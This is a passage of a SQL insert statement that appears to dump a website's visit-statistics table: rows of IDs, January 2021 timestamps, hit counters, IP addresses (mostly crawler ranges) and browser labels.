,0,0,'69.171.251.7','other'),(549967,1609707440,1,1,0,0,'69.171.251.31','other'),(549968,1609707811,1,1,0,0,'66.220.149.22','other'),(549969,1609708340,1,1,0,0,'66.220.149.32','other'),(549970,1609709286,1,1,0,0,'31.13.103.24','other'),(549971,1609709378,1,1,0,0,'173.252.95.118','other'),(549972,1609709694,1,1,0,0,'69.171.251.27','other'),(549973,1609709899,1,1,0,0,'66.220.149.113','other'),(549974,1609710138,1,1,0,0,'66.220.149.22','other'),(549975,1609711469,1,1,0,0,'69.171.251.14','other'),(549976,1609712087,1,1,0,0,'173.252.95.5','other'),(549977,1609712576,1,1,0,0,'173.252.83.4','other'),(549978,1609712664,1,1,0,0,'173.252.95.116','other'),(549979,1609713654,1,1,0,0,'66.220.149.6','other'),(549980,1609714418,1,1,0,0,'69.171.251.19','other'),(549981,1609714420,1,1,0,0,'173.252.95.120','other'),(549982,1609714883,1,1,0,0,'66.220.149.118','other'),(549983,1609717235,1,1,0,0,'173.252.95.113','other'),(549984,1609718272,1,1,0,0,'173.252.95.12','other'),(549985,1609719198,1,1,0,0,'69.171.251.20','other'),(549987,1609722515,1,1,0,0,'173.252.127.31','other'),(549988,1609722516,1,1,0,0,'69.171.251.13','other'),(549989,1609723981,1,1,0,0,'69.171.251.1','other'),(549990,1609729498,1,1,0,0,'23.228.109.146','chrome'),(549991,1609730271,1,1,0,0,'31.13.115.22','other'),(549992,1609730530,1,0,1,0,'66.249.70.45',''),(549993,1609737749,1,1,0,0,'69.171.251.28','other'),(549994,1609738341,1,1,0,0,'31.13.115.22','other'),(549995,1609739537,2,2,0,0,'173.252.127.31','other'),(549996,1609739819,1,1,0,0,'173.252.127.24','other'),(549997,1609742838,1,1,0,0,'173.252.95.23','other'),(549998,1609743484,1,1,0,0,'173.252.83.13','other'),(549999,1609745517,1,1,0,0,'173.252.95.3','other'),(550000,1609746120,1,1,0,0,'173.252.127.22','other'),(550001,1609746159,1,1,0,0,'173.252.95.1','other'),(550002,1609746240,1,1,0,0,'69.171.251.113','other'),(550003,1609746547,1,1,0,0,'69.171.251.25','other'),(550004,1609746554,1,1,0,0,'66.220.149.26','other'),(550005,1609747247,1,1,0,0,'173.252.95.23','other'),(550006,1609747378,1,1,0,0,'173.252.127.26','other'),(550007,1609749100,1,1,0,0,'69.171.251.1','other'),(550008,1609749108,1,1,0,0,'173.252.127.7','other'),(550009,1609749507,1,1,0,0,'91.196.178.75','chrome'),(550010,1609749707,1,1,0,0,'173.252.95.5','other'),(550011,1609749966,1,1,0,0,'173.252.95.11','other'),(550012,1609750623,1,1,0,0,'69.171.251.111','other'),(550014,1609751476,1,1,0,0,'173.252.95.10','other'),(550015,1609751479,1,1,0,0,'173.252.127.16','other'),(550016,1609751577,1,1,0,0,'69.171.251.27','other'),(550017,1609752051,1,1,0,0,'173.252.95.13','other'),(550018,1609752164,1,1,0,0,'66.220.149.24','other'),(550019,1609755968,1,1,0,0,'173.252.95.15','other'),(550020,1609756608,1,1,0,0,'31.13.127.116','other'),(550021,1609757058,1,1,0,0,'173.252.95.8','other'),(550022,1609757081,1,1,0,0,'173.252.127.30','other'),(550023,1609758979,1,1,0,0,'69.171.251.24','other'),(550024,1609759462,1,1,0,0,'173.252.95.19','other'),(550025,1609760595,1,1,0,0,'173.252.95.20','other'),(550026,1609761069,1,1,0,0,'31.13.103.116','other'),(550027,1609762095,1,1,0,0,'66.220.149.118','other'),(550028,1609763431,1,1,0,0,'173.252.95.18','other'),(550029,1609763452,1,1,0,0,'66.220.149.24','other'),(550030,1609763518,1,1,0,0,'31.13.127.20','other'),(550031,1609764791,1,1,0,0,'173.252.95.7','other'),(550032,1609765849,1,1,0,0,'173.252.127.3','other'),(550033,1609765948,1,1,0,0,'91.196.178.75','chrome'),(550034,1609767019,1,1,0,0,'69.171.251.19','other'),(550035,1609767985,1,1,0,0,'173.252.95.6','other'),(550036,1609768659,1,1,0,0,'66.220.149.111','other'),(550037,1609770147,1,1,0,0,'173.252.95.30','other'),(550038,1609772336,1,1,0,0,'176.118.53.207','chrome'),(550039,1609772815,1,1,0,0,'69.171.251.31','other'),(550040,1609773444,1,1,0,0,'69.171.251.27','other'),(550041,1609774054,1,1,0,0,'69.171.251.120','other'),(550042,1609776716,1,1,0,0,'173.252.95.119','other'),(550043,1609776851,1,1,0,0,'173.252.83.7','other'),(550044,1609777022,1,1,0,0,'31.13.127.16','other'),(550045,1609777044,1,1,0,0,'173.252.95.5','other'),(550046,1609778460,1,1,0,0,'66.220.149.25','other'),(550047,1609778614,1,1,0,0,'69.171.251.18','other'),(550048,1609780646,1,1,0,0,'69.171.251.22','other'),(550049,1609781103,1,1,0,0,'69.171.251.112','other'),(550050,1609781159,1,1,0,0,'173.252.95.11','other'),(550051,1609781606,1,1,0,0,'173.252.95.15','other'),(550052,1609781619,1,1,0,0,'69.171.251.21','other'),(550053,1609781707,1,1,0,0,'173.252.95.8','other'),(550054,1609781877,1,1,0,0,'69.171.251.10','other'),(550055,1609782062,1,1,0,0,'173.252.95.118','other'),(550056,1609782148,1,1,0,0,'69.171.251.113','other'),(550057,1609782707,1,1,0,0,'69.171.251.27','other'),(550058,1609784132,1,1,0,0,'69.171.251.21','other'),(550059,1609784247,1,1,0,0,'173.252.95.120','other'),(550060,1609784634,1,1,0,0,'66.220.149.11','other'),(550061,1609784668,1,1,0,0,'69.171.251.27','other'),(550062,1609785195,1,1,0,0,'173.252.95.28','other'),(550063,1609785250,1,1,0,0,'69.171.251.10','other'),(550064,1609786516,1,1,0,0,'173.252.95.24','other'),(550065,1609786963,1,1,0,0,'69.171.251.4','other'),(550066,1609787077,1,1,0,0,'69.171.251.31','other'),(550067,1609788817,1,1,0,0,'173.252.95.28','other'),(550068,1609790633,1,1,0,0,'173.252.95.120','other'),(550069,1609791185,1,1,0,0,'173.252.127.14','other'),(550070,1609791186,1,1,0,0,'66.220.149.4','other'),(550071,1609791271,1,1,0,0,'173.252.95.10','other'),(550072,1609791658,1,1,0,0,'173.252.95.25','other'),(550073,1609793892,1,1,0,0,'173.252.95.18','other'),(550074,1609794191,1,1,0,0,'69.171.251.18','other'),(550075,1609794847,1,1,0,0,'31.13.103.6','other'),(550076,1609795242,1,1,0,0,'69.171.251.29','other'),(550077,1609795243,1,1,0,0,'173.252.95.16','other'),(550078,1609795845,1,1,0,0,'31.13.127.1','other'),(550079,1609799685,1,1,0,0,'69.171.251.11','other'),(550080,1609807286,1,1,0,0,'173.252.95.120','other'),(550081,1609809291,1,1,0,0,'66.249.70.45','chrome'),(550082,1609816102,1,0,1,0,'66.249.70.45',''),(550083,1609823547,1,1,0,0,'173.252.95.7','other'),(550084,1609823722,1,1,0,0,'69.171.251.23','other'),(550085,1609827670,1,1,0,0,'69.171.251.116','other'),(550086,1609827710,1,1,0,0,'173.252.95.113','other'),(550087,1609834766,1,1,0,0,'69.171.251.20','other'),(550088,1609834795,1,1,0,0,'173.252.95.116','other'),(550089,1609835136,1,1,0,0,'173.252.95.5','other'),(550090,1609835199,1,1,0,0,'173.252.111.15','other'),(550091,1609836387,1,0,1,0,'66.249.70.43',''),(550092,1609836513,1,1,0,0,'173.252.127.11','other'),(550093,1609838450,1,1,0,0,'173.252.95.7','other'),(550094,1609840823,1,1,0,0,'69.171.251.17','other'),(550095,1609842213,1,1,0,0,'66.220.149.8','other'),(550096,1609843126,3,3,0,0,'91.196.178.75','chrome'),(550097,1609845672,1,1,0,0,'66.220.149.113','other'),(550098,1609845873,1,1,0,0,'31.13.115.20','other'),(550099,1609846152,1,1,0,0,'173.252.95.21','other'),(550100,1609846795,1,1,0,0,'173.252.95.15','other'),(550101,1609847656,1,1,0,0,'195.191.168.30','chrome'),(550102,1609848363,1,1,0,0,'173.252.95.9','other'),(550103,1609848385,1,1,0,0,'31.13.127.111','other'),(550104,1609849153,1,1,0,0,'66.220.149.32','other'),(550105,1609849302,1,1,0,0,'173.252.95.11','other'),(550106,1609850853,1,1,0,0,'31.13.127.119','other'),(550107,1609850913,1,1,0,0,'69.171.251.111','other'),(550108,1609851724,1,1,0,0,'69.171.251.113','other'),(550109,1609852443,1,1,0,0,'173.252.95.6','other'),(550110,1609853924,1,1,0,0,'31.13.103.3','other'),(550111,1609855581,1,1,0,0,'94.153.66.136','other'),(550112,1609855966,1,1,0,0,'66.220.149.117','other'),(550113,1609858598,1,1,0,0,'69.171.251.4','other'),(550114,1609859138,1,1,0,0,'173.252.83.113','other'),(550115,1609860558,1,1,0,0,'69.171.251.14','other'),(550116,1609864755,1,1,0,0,'173.252.95.13','other'),(550117,1609864756,1,1,0,0,'69.171.251.119','other'),(550118,1609866289,1,1,0,0,'173.252.95.3','other'),(550119,1609867339,1,1,0,0,'173.252.95.2','other'),(550120,1609867919,1,1,0,0,'69.171.251.6','other'),(550121,1609868468,1,1,0,0,'173.252.95.6','other'),(550122,1609868494,1,1,0,0,'69.171.251.17','other'),(550123,1609868574,1,1,0,0,'31.13.115.118','other'),(550124,1609871859,1,1,0,0,'173.252.95.9','other'),(550125,1609872469,1,1,0,0,'69.171.251.29','other'),(550126,1609873155,1,1,0,0,'69.171.251.117','other'),(550128,1609874310,1,1,0,0,'66.220.149.8','other'),(550130,1609874811,1,1,0,0,'173.252.95.6','other'),(550131,1609876446,1,1,0,0,'66.220.149.9','other'),(550132,1609876498,1,1,0,0,'69.171.251.111','other'),(550133,1609877786,1,1,0,0,'62.205.136.69','chrome'),(550134,1609878452,1,1,0,0,'31.13.115.116','other'),(550135,1609878794,1,1,0,0,'69.171.251.15','other'),(550136,1609878858,1,1,0,0,'173.252.95.27','other'),(550137,1609879895,1,1,0,0,'173.252.95.24','other'),(550138,1609883863,1,1,0,0,'69.171.249.17','other'),(550139,1609883864,1,1,0,0,'69.171.249.24','other'),(550140,1609883865,1,1,0,0,'69.171.249.1','other'),(550141,1609885012,1,1,0,0,'173.252.95.113','other'),(550142,1609889279,1,1,0,0,'173.252.95.118','other'),(550143,1609889284,1,1,0,0,'173.252.127.17','other'),(550144,1609901613,1,0,1,0,'66.249.70.45',''),(550145,1609905286,1,1,0,0,'173.252.95.118','other'),(550146,1609908339,1,1,0,0,'66.249.70.43','chrome'),(550147,1609909156,1,1,0,0,'173.252.95.5','other'),(550148,1609909165,1,1,0,0,'69.171.251.14','other'),(550149,1609909456,1,1,0,0,'66.249.70.47','chrome'),(550150,1609909561,1,1,0,0,'173.252.127.21','other'),(550151,1609910236,1,1,0,0,'69.171.251.25','other'),(550152,1609910278,1,1,0,0,'173.252.95.2','other'),(550153,1609910584,1,1,0,0,'66.249.70.47','chrome'),(550154,1609915242,1,1,0,0,'66.249.70.43','chrome'),(550155,1609917356,1,1,0,0,'91.196.178.75','chrome'),(550156,1609917413,1,1,0,0,'31.13.127.117','other'),(550157,1609917414,1,1,0,0,'31.13.127.19','other'),(550158,1609917472,1,1,0,0,'31.13.103.26','other'),(550159,1609917475,1,1,0,0,'173.252.95.12','other'),(550160,1609917861,1,1,0,0,'31.13.127.8','other'),(550161,1609917862,1,1,0,0,'31.13.127.9','other'),(550162,1609917863,1,1,0,0,'31.13.127.20','other'),(550164,1609917867,1,1,0,0,'31.13.127.113','other'),(550165,1609917868,1,1,0,0,'31.13.127.13','other'),(550166,1609917870,1,1,0,0,'31.13.127.4','other'),(550168,1609917872,1,1,0,0,'31.13.127.24','other'),(550169,1609917946,1,1,0,0,'173.252.79.22','other'),(550170,1609918014,1,0,1,0,'66.249.70.43',''),(550171,1609918248,1,1,0,0,'173.252.127.20','other'),(550172,1609918529,1,1,0,0,'69.171.251.5','other'),(550173,1609918787,1,1,0,0,'66.220.149.29','other'),(550174,1609919236,2,2,0,0,'91.196.178.75','chrome'),(550176,1609919237,1,1,0,0,'31.13.127.17','other'),(550177,1609919339,1,1,0,0,'69.171.251.10','other'),(550178,1609919345,1,1,0,0,'173.252.95.23','other'),(550179,1609919850,1,1,0,0,'69.171.251.4','other'),(550180,1609919858,1,1,0,0,'173.252.95.13','other'),(550181,1609919989,1,1,0,0,'66.220.149.15','other'),(550182,1609919990,1,1,0,0,'173.252.95.118','other'),(550183,1609921343,1,1,0,0,'66.220.149.9','other'),(550184,1609921346,1,1,0,0,'173.252.95.2','other'),(550185,1609921405,1,1,0,0,'69.171.251.22','other'),(550186,1609921575,1,1,0,0,'173.252.111.8','other'),(550188,1609922197,1,1,0,0,'66.220.149.28','other'),(550189,1609922198,1,1,0,0,'173.252.95.3','other'),(550190,1609922214,1,1,0,0,'31.13.127.118','other'),(550191,1609922302,1,1,0,0,'69.171.251.10','other'),(550192,1609922303,1,1,0,0,'173.252.95.24','other'),(550193,1609922730,1,1,0,0,'66.220.149.119','other'),(550194,1609922734,1,1,0,0,'69.171.251.22','other'),(550195,1609924315,1,1,0,0,'188.163.40.106','firefox'),(550196,1609925123,1,1,0,0,'173.252.95.24','other'),(550197,1609925483,1,0,1,0,'66.249.70.45',''),(550198,1609925951,1,1,0,0,'91.196.178.75','chrome'),(550199,1609926094,1,1,0,0,'173.252.111.2','other'),(550200,1609926097,1,1,0,0,'173.252.95.19','other'),(550201,1609926152,1,1,0,0,'157.245.119.115','other'),(550202,1609926508,1,1,0,0,'69.171.251.5','other'),(550203,1609926613,1,1,0,0,'66.249.70.45','chrome'),(550204,1609926632,2,2,0,0,'173.252.111.22','other'),(550205,1609926647,1,1,0,0,'66.249.70.43','chrome'),(550206,1609926909,1,1,0,0,'66.220.149.13','other'),(550207,1609926914,1,1,0,0,'69.171.251.18','other'),(550208,1609927003,1,1,0,0,'173.252.127.14','other'),(550209,1609929808,1,1,0,0,'159.203.120.123','other'),(550210,1609930151,1,1,0,0,'173.252.111.22','other'),(550211,1609930163,1,1,0,0,'173.252.95.14','other'),(550212,1609930456,1,1,0,0,'66.220.149.23','other'),(550213,1609930473,1,1,0,0,'69.171.251.21','other'),(550214,1609930529,1,1,0,0,'173.252.127.120','other'),(550215,1609930551,1,1,0,0,'173.252.127.118','other'),(550216,1609930552,1,1,0,0,'173.252.95.13','other'),(550217,1609931299,1,1,0,0,'173.252.111.13','other'),(550218,1609931315,1,1,0,0,'66.220.149.19','other'),(550220,1609931319,1,1,0,0,'31.13.127.117','other'),(550221,1609931339,1,1,0,0,'69.171.251.22','other'),(550222,1609931947,1,1,0,0,'80.255.64.192','firefox'),(550223,1609932209,1,1,0,0,'69.171.251.25','other'),(550224,1609933317,1,1,0,0,'66.249.70.43','chrome'),(550225,1609933386,1,1,0,0,'69.171.251.116','other'),(550227,1609933641,1,1,0,0,'173.252.95.18','other'),(550229,1609934051,1,1,0,0,'176.38.155.5','chrome'),(550230,1609934326,1,1,0,0,'175.44.42.11','firefox'),(550231,1609934405,1,1,0,0,'173.252.95.20','other'),(550233,1609934466,1,1,0,0,'31.13.127.117','other'),(550234,1609935837,1,1,0,0,'173.252.95.14','other'),(550235,1609935838,1,1,0,0,'66.220.149.116','other'),(550236,1609937044,1,1,0,0,'185.237.217.11','chrome'),(550237,1609937235,1,1,0,0,'66.249.70.45','chrome'),(550238,1609937781,1,1,0,0,'66.220.149.117','other'),(550239,1609938806,1,1,0,0,'66.249.70.47','chrome'),(550240,1609938830,1,1,0,0,'66.220.149.2','other'),(550241,1609938831,1,1,0,0,'173.252.95.7','other'),(550242,1609941685,1,1,0,0,'31.13.103.19','other'),(550243,1609942319,1,1,0,0,'173.252.87.116','other'),(550244,1609942320,1,1,0,0,'173.252.87.14','other'),(550246,1609942766,1,1,0,0,'31.13.127.118','other'),(550247,1609942767,1,1,0,0,'31.13.127.7','other'),(550248,1609943743,1,1,0,0,'78.27.145.20','chrome'),(550249,1609943764,2,2,0,0,'31.13.127.112','other'),(550250,1609943765,2,2,0,0,'31.13.127.8','other'),(550255,1609943766,1,1,0,0,'31.13.127.23','other'),(550256,1609943798,1,1,0,0,'69.171.251.7','other'),(550257,1609943813,1,1,0,0,'69.171.251.9','other'),(550258,1609944468,1,1,0,0,'69.171.249.18','other'),(550259,1609944528,1,1,0,0,'173.252.95.24','other'),(550260,1609946095,1,1,0,0,'69.171.251.17','other'),(550261,1609946623,1,1,0,0,'31.13.127.1','other'),(550262,1609948042,1,1,0,0,'173.252.95.26','other'),(550263,1609949051,1,1,0,0,'46.211.1.94','chrome'),(550264,1609949071,1,1,0,0,'173.252.83.10','other'),(550265,1609950292,1,1,0,0,'69.171.251.3','other'),(550266,1609950356,1,1,0,0,'31.13.127.4','other'),(550267,1609950799,1,1,0,0,'173.252.95.24','other'),(550268,1609950809,1,1,0,0,'77.52.211.15','chrome'),(550269,1609952807,1,1,0,0,'91.196.178.7','chrome'),(550270,1609952813,1,1,0,0,'91.196.178.5','chrome'),(550271,1609953714,1,1,0,0,'31.13.127.14','other'),(550272,1609953717,1,1,0,0,'173.252.95.23','other'),(550273,1609954047,1,1,0,0,'173.252.95.24','other'),(550274,1609955750,1,1,0,0,'173.252.95.21','other'),(550275,1609956120,1,1,0,0,'66.249.70.45','chrome'),(550276,1609957025,2,2,0,0,'66.249.70.45','chrome'),(550277,1609957540,1,1,0,0,'173.252.127.22','other'),(550278,1609957542,1,1,0,0,'69.171.251.5','other'),(550279,1609957830,1,1,0,0,'66.249.70.43','chrome'),(550280,1609958005,1,1,0,0,'91.196.178.16','chrome'),(550281,1609958412,1,1,0,0,'173.252.95.24','other'),(550282,1609958962,1,1,0,0,'185.237.217.11','chrome'),(550283,1609960695,1,1,0,0,'31.13.127.15','other'),(550284,1609960696,1,1,0,0,'31.13.127.24','other'),(550285,1609961104,1,1,0,0,'173.252.111.1','other'),(550286,1609961447,1,1,0,0,'173.252.95.14','other'),(550287,1609961448,1,1,0,0,'173.252.111.24','other'),(550288,1609961568,1,1,0,0,'178.251.109.241','chrome'),(550289,1609961644,1,1,0,0,'173.252.111.118','other'),(550291,1609961786,1,1,0,0,'66.249.70.43','chrome'),(550292,1609961972,1,1,0,0,'69.171.251.20','other'),(550293,1609961997,1,1,0,0,'69.171.251.116','other'),(550294,1609962012,1,1,0,0,'128.124.41.27','chrome'),(550295,1609962013,1,1,0,0,'173.252.111.5','other'),(550296,1609962737,1,1,0,0,'173.252.95.119','other'),(550297,1609963073,1,1,0,0,'185.237.217.1','chrome'),(550298,1609963200,1,1,0,0,'31.13.127.118','other'),(550299,1609963201,1,1,0,0,'31.13.127.7','other'),(550300,1609963504,1,1,0,0,'91.196.178.62','chrome'),(550301,1609964486,1,1,0,0,'69.171.251.117','other'),(550302,1609964552,1,1,0,0,'173.252.111.4','other'),(550303,1609964877,1,1,0,0,'66.249.70.43','chrome'),(550304,1609964990,1,1,0,0,'91.196.178.37','chrome'),(550305,1609966499,1,1,0,0,'66.220.149.3','other'),(550306,1609966500,1,1,0,0,'173.252.95.113','other'),(550307,1609966908,1,1,0,0,'173.252.127.31','other'),(550308,1609966909,1,1,0,0,'173.252.95.3','other'),(550310,1609966910,1,1,0,0,'173.252.95.9','other'),(550314,1609966911,1,1,0,0,'173.252.95.13','other'),(550315,1609967257,1,1,0,0,'173.252.127.30','other'),(550316,1609967274,1,1,0,0,'173.252.127.116','other'),(550317,1609968460,1,1,0,0,'91.196.178.40','chrome'),(550318,1609969508,1,1,0,0,'173.252.111.118','other'),(550319,1609969509,1,1,0,0,'31.13.127.18','other'),(550320,1609969510,1,1,0,0,'173.252.95.3','other'),(550321,1609969521,1,1,0,0,'178.133.37.49','chrome'),(550322,1609969997,1,1,0,0,'31.13.127.11','other'),(550323,1609969998,1,1,0,0,'31.13.127.118','other'),(550324,1609970432,1,1,0,0,'31.13.127.18','other'),(550325,1609970433,1,1,0,0,'31.13.127.112','other'),(550326,1609970447,1,1,0,0,'31.133.98.248','other'),(550327,1609971767,1,1,0,0,'173.252.95.27','other'),(550329,1609974273,1,1,0,0,'94.178.245.83','chrome'),(550330,1609974288,1,1,0,0,'69.171.249.9','other'),(550331,1609974289,1,1,0,0,'69.171.249.18','other'),(550332,1609976494,2,1,1,0,'66.249.70.47',''),(550333,1609976627,1,1,0,0,'66.249.70.45','chrome'),(550334,1609977598,1,1,0,0,'173.252.95.7','other'),(550335,1609984942,1,1,0,0,'66.249.70.47','chrome'),(550336,1609987197,2,1,1,0,'66.249.70.45',''),(550337,1609991048,1,1,0,0,'31.13.127.14','other'),(550338,1609991049,1,1,0,0,'173.252.95.14','other'),(550339,1609995769,1,1,0,0,'31.13.127.113','other'),(550340,1609995792,1,1,0,0,'173.252.95.6','other'),(550341,1609995854,2,0,2,0,'66.249.70.45',''),(550342,1609996215,1,1,0,0,'46.211.48.159','chrome'),(550343,1610002819,1,1,0,0,'31.13.127.23','other'),(550344,1610004161,1,1,0,0,'31.13.127.113','other'),(550345,1610004477,1,1,0,0,'66.249.70.43','chrome'),(550346,1610005455,1,1,0,0,'69.171.249.18','other'),(550347,1610005637,1,1,0,0,'66.249.70.47','chrome'),(550348,1610006565,1,1,0,0,'69.171.251.16','other'),(550349,1610007681,1,1,0,0,'173.252.111.113','other'),(550351,1610008794,2,1,1,0,'66.249.70.45',''),(550352,1610009150,1,1,0,0,'66.249.70.43','chrome'),(550353,1610010565,1,1,0,0,'195.211.86.2','chrome'),(550354,1610012552,1,1,0,0,'173.252.95.4','other'),(550355,1610013207,1,1,0,0,'209.17.97.82','other'),(550356,1610014099,1,1,0,0,'173.252.95.113','other'),(550357,1610014100,1,1,0,0,'173.252.95.112','other'),(550358,1610014665,1,1,0,0,'185.237.217.11','chrome'),(550359,1610015739,1,1,0,0,'173.252.95.118','other'),(550360,1610016579,1,1,0,0,'31.13.103.119','other'),(550361,1610018231,1,1,0,0,'173.252.95.15','other'),(550362,1610018787,1,1,0,0,'69.171.251.26','other'),(550363,1610019417,1,1,0,0,'31.13.127.5','other'),(550364,1610021365,1,1,0,0,'66.249.70.43','chrome'),(550365,1610024816,1,1,0,0,'31.13.127.24','other'),(550366,1610025562,1,1,0,0,'173.252.95.5','other'),(550367,1610028693,1,1,0,0,'69.171.251.18','other'),(550368,1610028712,1,1,0,0,'69.171.251.26','other'),(550369,1610028923,1,1,0,0,'94.153.37.190','chrome'),(550370,1610028938,1,1,0,0,'31.13.127.7','other'),(550371,1610028939,1,1,0,0,'31.13.127.17','other'),(550372,1610028955,1,1,0,0,'69.171.251.13','other'),(550373,1610029583,1,1,0,0,'173.252.95.119','other'),(550374,1610031135,1,1,0,0,'31.13.127.13','other'),(550376,1610031142,1,1,0,0,'31.13.127.1','other'),(550377,1610031148,1,1,0,0,'31.13.127.23','other'),(550378,1610031153,1,1,0,0,'31.13.127.113','other'),(550379,1610031160,1,1,0,0,'31.13.127.8','other'),(550380,1610031719,1,1,0,0,'31.13.127.9','other'),(550381,1610031720,1,1,0,0,'31.13.127.111','other'),(550382,1610035028,1,1,0,0,'31.13.103.19','other'),(550383,1610035774,1,1,0,0,'173.252.95.27','other'),(550384,1610036017,1,1,0,0,'173.252.95.9','other'),(550385,1610036636,1,1,0,0,'173.252.95.28','other'),(550386,1610041876,1,1,0,0,'31.13.127.3','other'),(550387,1610042216,1,1,0,0,'173.252.95.23','other'),(550388,1610042975,1,1,0,0,'173.252.95.29','other'),(550389,1610042976,1,1,0,0,'173.252.111.9','other'),(550390,1610047515,1,1,0,0,'173.252.95.116','other'),(550391,1610048469,1,1,0,0,'173.252.127.17','other'),(550392,1610048470,1,1,0,0,'173.252.95.113','other'),(550393,1610048502,1,1,0,0,'66.249.75.43','chrome'),(550394,1610048573,1,1,0,0,'173.252.111.10','other'),(550395,1610048586,1,1,0,0,'173.252.95.112','other'),(550396,1610051356,1,1,0,0,'66.220.149.6','other'),(550397,1610051414,1,1,0,0,'88.155.165.88','chrome'),(550398,1610051514,1,1,0,0,'69.171.251.18','other'),(550399,1610051516,1,1,0,0,'66.220.149.34','other'),(550400,1610052429,1,1,0,0,'66.220.149.2','other'),(550401,1610055845,1,1,0,0,'31.13.127.12','other'),(550402,1610055878,1,1,0,0,'91.235.227.184','other'),(550403,1610056815,1,1,0,0,'66.249.70.43','chrome'),(550404,1610058904,1,1,0,0,'95.132.61.54','chrome'),(550405,1610059255,1,1,0,0,'66.249.70.43','chrome'),(550406,1610059711,1,0,1,0,'66.249.70.47',''),(550407,1610059729,1,1,0,0,'66.249.70.45','chrome'),(550408,1610060334,1,1,0,0,'31.13.127.111','other'),(550409,1610060335,1,1,0,0,'173.252.95.26','other'),(550410,1610061181,1,0,1,0,'66.249.70.47',''),(550411,1610061527,1,1,0,0,'66.249.70.45','chrome'),(550412,1610062847,1,1,0,0,'31.13.115.17','other'),(550413,1610063276,1,1,0,0,'66.220.149.120','other'),(550414,1610063278,1,1,0,0,'69.171.251.13','other'),(550415,1610063412,1,1,0,0,'173.252.127.33','other'),(550416,1610063562,1,1,0,0,'31.13.115.20','other'),(550417,1610063596,1,1,0,0,'31.13.115.4','other'),(550418,1610065206,1,0,1,0,'66.249.70.47',''),(550419,1610069619,1,0,1,0,'66.249.70.45',''),(550420,1610070517,2,2,0,0,'66.249.70.43','chrome'),(550421,1610072582,1,0,1,0,'66.249.70.45',''),(550422,1610073531,1,0,1,0,'66.249.70.45',''),(550423,1610073693,1,1,0,0,'66.249.70.45','chrome'),(550424,1610081396,1,0,1,0,'66.249.70.45',''),(550425,1610084006,1,1,0,0,'31.13.115.19','other'),(550426,1610085260,1,1,0,0,'128.124.208.234','chrome'),(550427,1610085777,1,1,0,0,'66.249.70.45','chrome'),(550428,1610092123,1,1,0,0,'66.249.70.45','chrome'),(550429,1610092542,1,1,0,0,'173.252.127.26','other'),(550430,1610094868,1,1,0,0,'31.13.127.15','other'),(550431,1610095008,1,0,1,0,'66.249.70.45',''),(550432,1610095431,1,1,0,0,'173.252.95.20','other'),(550433,1610095583,1,1,0,0,'66.249.70.43','chrome'),(550434,1610095920,1,1,0,0,'66.249.70.45','chrome'),(550435,1610096977,1,1,0,0,'173.252.111.12','other'),(550436,1610109734,1,1,0,0,'66.220.149.10','other'),(550438,1610109743,1,1,0,0,'66.220.149.16','other'),(550439,1610109744,1,1,0,0,'69.171.251.15','other'),(550440,1610110716,1,1,0,0,'31.13.127.111','other'),(550441,1610110735,1,1,0,0,'173.252.95.9','other'),(550442,1610111082,1,0,1,0,'66.249.70.43',''),(550443,1610112547,1,1,0,0,'175.44.42.228','firefox'),(550444,1610114961,1,0,1,0,'66.249.70.45',''),(550445,1610119207,1,1,0,0,'31.13.103.9','other'),(550447,1610125457,1,1,0,0,'31.13.127.16','other'),(550448,1610125458,1,1,0,0,'31.13.127.113','other'),(550449,1610126235,1,1,0,0,'91.196.178.140','chrome'),(550450,1610128479,1,1,0,0,'66.220.149.6','other'),(550451,1610131402,1,1,0,0,'66.220.149.16','other'),(550452,1610136710,1,1,0,0,'173.252.79.19','other'),(550453,1610136711,1,1,0,0,'173.252.79.20','other'),(550454,1610137498,1,1,0,0,'173.252.95.6','other'),(550455,1610138931,1,1,0,0,'91.196.178.45','chrome'),(550456,1610142114,1,1,0,0,'31.13.103.118','other'),(550457,1610145774,1,1,0,0,'173.252.95.14','other'),(550458,1610147295,1,1,0,0,'173.252.95.119','other'),(550459,1610147337,1,1,0,0,'173.252.127.1','other'),(550460,1610147341,1,1,0,0,'173.252.111.8','other'),(550461,1610159049,1,0,1,0,'66.249.70.47',''),(550462,1610169512,1,1,0,0,'173.252.83.4','other'),(550463,1610171534,1,1,0,0,'69.171.251.27','other'),(550464,1610172495,1,1,0,0,'69.171.251.29','other'),(550465,1610172496,1,1,0,0,'173.252.127.120','other'),(550466,1610172508,1,1,0,0,'69.171.251.12','other'),(550467,1610173390,3,3,0,0,'3.235.77.80','chrome'),(550468,1610180553,1,1,0,0,'31.13.127.7','other'),(550469,1610181451,1,1,0,0,'173.252.127.7','other'),(550470,1610186567,1,1,0,0,'173.252.111.2','other'),(550471,1610186568,1,1,0,0,'173.252.111.8','other'),(550472,1610188144,1,1,0,0,'173.252.95.24','other'),(550473,1610193025,1,1,0,0,'31.13.127.16','other'),(550474,1610194848,1,1,0,0,'173.252.95.15','other'),(550475,1610196514,2,2,0,0,'31.13.127.118','other'),(550476,1610196515,1,1,0,0,'31.13.127.14','other'),(550481,1610204078,1,1,0,0,'173.252.95.1','other'),(550482,1610206065,1,1,0,0,'31.13.127.21','other'),(550483,1610206066,1,1,0,0,'31.13.127.9','other'),(550484,1610206835,1,1,0,0,'173.252.83.9','other'),(550485,1610209157,1,1,0,0,'31.13.127.20','other'),(550486,1610209799,1,1,0,0,'173.252.95.13','other'),(550487,1610212224,1,1,0,0,'69.171.251.15','other'),(550488,1610213211,1,1,0,0,'173.252.95.2','other'),(550489,1610213571,1,1,0,0,'69.171.251.26','other'),(550490,1610218401,1,1,0,0,'138.246.253.24','chrome'),(550491,1610219377,1,1,0,0,'69.171.251.31','other'),(550492,1610219826,1,1,0,0,'185.237.217.11','chrome'),(550493,1610220113,2,2,0,0,'173.252.111.19','other'),(550495,1610220114,1,1,0,0,'173.252.111.116','other'),(550496,1610220115,1,1,0,0,'173.252.111.14','other'),(550497,1610220116,1,1,0,0,'173.252.111.13','other'),(550498,1610220119,1,1,0,0,'173.252.111.16','other'),(550499,1610220121,1,1,0,0,'69.171.251.26','other'),(550503,1610220144,1,1,0,0,'91.196.178.147','chrome'),(550504,1610220157,1,1,0,0,'91.196.178.119','chrome'),(550505,1610220181,2,2,0,0,'91.196.178.107','chrome'),(550506,1610220237,1,1,0,0,'173.252.87.116','other'),(550507,1610220286,1,1,0,0,'178.95.246.162','chrome'),(550508,1610220293,1,1,0,0,'91.196.178.101','chrome'),(550509,1610220432,1,1,0,0,'91.196.178.172','chrome'),(550510,1610220510,1,1,0,0,'91.196.178.122','chrome'),(550511,1610220554,1,1,0,0,'173.252.95.17','other'),(550512,1610220568,1,1,0,0,'37.55.56.60','chrome'),(550513,1610220577,1,1,0,0,'17